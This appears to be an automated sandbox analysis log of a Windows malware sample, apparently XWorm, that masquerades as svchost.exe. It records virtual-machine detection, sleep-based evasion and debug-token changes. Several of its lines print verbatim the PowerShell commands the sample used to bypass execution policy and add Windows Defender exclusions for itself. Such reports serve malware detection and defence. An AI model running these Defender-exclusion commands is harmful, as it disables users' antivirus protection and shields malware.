Source: C:\Users\user\AppData\Local\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\svchost.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\Desktop\file.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\file.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController

Source: C:\Users\user\Desktop\file.exe	Memory allocated: D00000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory allocated: 1A9A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\svchost.exe	Memory allocated: 2410000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\svchost.exe	Memory allocated: 1A410000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\svchost.exe	Memory allocated: 5A0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\svchost.exe	Memory allocated: 1A4A0000 memory reserve \| memory write watch

Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\svchost.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\svchost.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\Desktop\file.exe	Window / User API: threadDelayed 6327	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window / User API: threadDelayed 3515	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5707	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4080	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5330	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4279	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2628	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6915	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7593
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1980

Source: C:\Users\user\Desktop\file.exe TID: 5432	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7528	Thread sleep time: -4611686018427385s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7748	Thread sleep time: -3689348814741908s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7956	Thread sleep count: 2628 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7956	Thread sleep count: 6915 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8036	Thread sleep time: -3689348814741908s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 744	Thread sleep count: 7593 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3260	Thread sleep count: 1980 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1440	Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Users\user\AppData\Local\svchost.exe TID: 7552	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\svchost.exe TID: 4248	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Users\user\Desktop\file.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\svchost.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\svchost.exe	File Volume queried: C:\ FullSizeInformation

Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\svchost.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\svchost.exe	Thread delayed: delay time: 922337203685477

Source: file.exe, 00000000.00000002.2963211372.000000001B9A4000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\file.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\file.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\file.exe'
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\svchost.exe'
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\file.exe'	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\svchost.exe'	Jump to behavior

Bypasses PowerShell execution policy

Source: C:\Users\user\Desktop\file.exe

Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\file.exe'

Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\file.exe'	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'file.exe'	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\svchost.exe'	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'	Jump to behavior

Source: file.exe, 00000000.00000002.2950679638.0000000002AA8000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.2950679638.0000000002A80000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 'PING!<Xwormmm>Program Manager<Xwormmm>0
Source: file.exe, 00000000.00000002.2950679638.0000000002AA8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Manager
Source: file.exe, 00000000.00000002.2950679638.0000000002AA8000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.2950679638.0000000002A80000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: PING!<Xwormmm>Program Manager<Xwormmm>0
Source: file.exe, 00000000.00000002.2950679638.0000000002AA8000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.2950679638.0000000002A80000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 'PING!<Xwormmm>Program Manager<Xwormmm>0@
Source: file.exe, 00000000.00000002.2950679638.0000000002AA8000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.2950679638.0000000002A80000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Manager2-

Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Users\user\Desktop\file.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
